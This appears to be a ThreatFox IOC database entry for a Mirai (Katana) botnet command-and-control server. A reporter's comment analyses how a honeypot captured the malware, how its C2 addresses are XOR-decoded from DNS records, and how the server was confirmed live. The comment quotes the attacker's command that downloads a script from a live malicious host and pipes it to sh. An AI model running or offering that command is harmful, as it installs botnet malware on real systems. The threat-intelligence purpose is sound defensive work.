🤲🏼 NEW | abuse.ch Community Hub! Earn recognition 🏅 for the malware intelligence you share, climb the leaderboards 📈, and connect with like-minded contributors who share your hunting focus 🤝. Ready to unlock your profile? Go to the Community Hub →

ThreatFox IOC Database

You are viewing the ThreatFox database entry for ip:port 159.65.67.52:44992.

Database Entry


IOC ID:1959715
IOC: 159.65.67.52:44992
IOC Type :ip:port
Threat Type :botnet_cc
Malware: Mirai
Malware alias:Katana
Confidence Level : Confidence level is high (100%)
Is compromised? : False
ASN:AS14061 DIGITALOCEAN-ASN
Country:- US
First seen:2026-10-10 06:01:48 UTC
Last seen:never
UUID:c0373ab4-c44e-11f1-bd13-42010aa4000a
Reporter ksi_digital
Reward 50 credits from anonymous
Tags:cowrie dns-xor elf honeypot Mirai telnet x86
Reference: https://bazaar.abuse.ch/sample/55d19b5c675819d5d2492e10bd44028d3e02426c7fa486c4515b804943e8d54e/

Avatar
ksi_digital
Mirai C2, confirmed live. Kit: on 2026-10-09 18:07 UTC 45.90.163.37 ran 'wget -O- http://176.65.139.40/tot|sh' on our Cowrie telnet honeypot (tot sha256 a7c881fdaa4f1f465d2656dfa51b245f3c3823943a796508fd0906a264ab7553 fetches jkl<arch> builds and runs them with 'ssh'). The x86 build jklx86 (sha256 55d19b5c675819d5d2492e10bd44028d3e02426c7fa486c4515b804943e8d54e, MalwareBazaar, Mirai) resolves seris.gd and XOR-decodes each A record with E7.70.8E.59 to get the C2 address; we derived the key offline by answering the bot's lookup with TEST-NET addresses (198.51.100.77 -> it connects 33.67.234.20, 203.0.113.1 -> 44.112.255.88). On 2026-10-10 seris.gd returned 120.49.205.109 and 41.205.42.92, which decode to 159.65.67.52 and 206.189.164.5; the fallback domain myrepis.gd (ThreatFox 1678597) returns 87.49.5.113, which decodes to 176.65.139.40, the kit's own download host (this confirms the key). The bot picks a random port around 38000-47000 per attempt. Live sandbox run 2026-10-10 01:58-02:02 UTC (only these two IPs reachable): it connected to 159.65.67.52:44992, the server accepted and held the session about 3 minutes while the bot sent 16-byte keepalives every 30 s plus reports of 87-495 bytes; no commands received. 206.189.164.5 was not contacted in that window. Confidence 100 = C2 accepted the bot live.